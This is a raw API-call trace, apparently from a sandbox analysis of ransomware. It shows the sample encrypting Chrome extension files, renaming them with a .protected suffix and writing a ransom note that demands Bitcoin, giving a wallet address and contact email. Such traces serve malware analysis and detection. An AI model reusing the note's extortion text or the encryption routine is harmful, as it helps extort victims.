[0079.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.334] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.334] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\.") returned 145 [0079.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.334] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.334] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.335] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\..") returned 146 [0079.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.335] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.335] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.335] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.335] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.335] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.335] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.335] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0079.336] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.336] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0079.337] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.337] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0079.338] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.338] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.338] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.338] CloseHandle (hObject=0x168) returned 1 [0079.338] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected") returned 167 [0079.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0079.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.339] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 161 [0079.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.340] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.340] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.340] lstrlenA (lpString="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") returned 684 [0079.341] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.341] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.341] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.341] CloseHandle (hObject=0x164) returned 1 [0079.341] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0079.341] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0079.341] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr") returned 142 [0079.341] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0079.341] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0079.341] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*") returned 144 [0079.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.341] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\.") returned 144 [0079.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.342] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\..") returned 145 [0079.342] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.342] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.342] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.342] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.342] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.342] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.342] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.342] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0079.343] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.343] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfc, lpOverlapped=0x0) returned 1 [0079.344] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.344] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfc, lpOverlapped=0x0) returned 1 [0079.344] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.344] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.345] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.345] CloseHandle (hObject=0x168) returned 1 [0079.345] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected") returned 166 [0079.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0079.345] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.345] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 160 [0079.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.346] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.346] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.347] lstrlenA (lpString="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") returned 684 [0079.347] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.347] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.347] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.347] CloseHandle (hObject=0x164) returned 1 [0079.347] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0079.347] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0079.347] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0079.347] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he") returned 142 [0079.347] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0079.347] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0079.347] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*") returned 144 [0079.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.348] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\.") returned 144 [0079.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.348] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.348] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\..") returned 145 [0079.348] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.348] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.348] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.348] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.348] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.348] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.348] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.348] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.349] CreateFileW 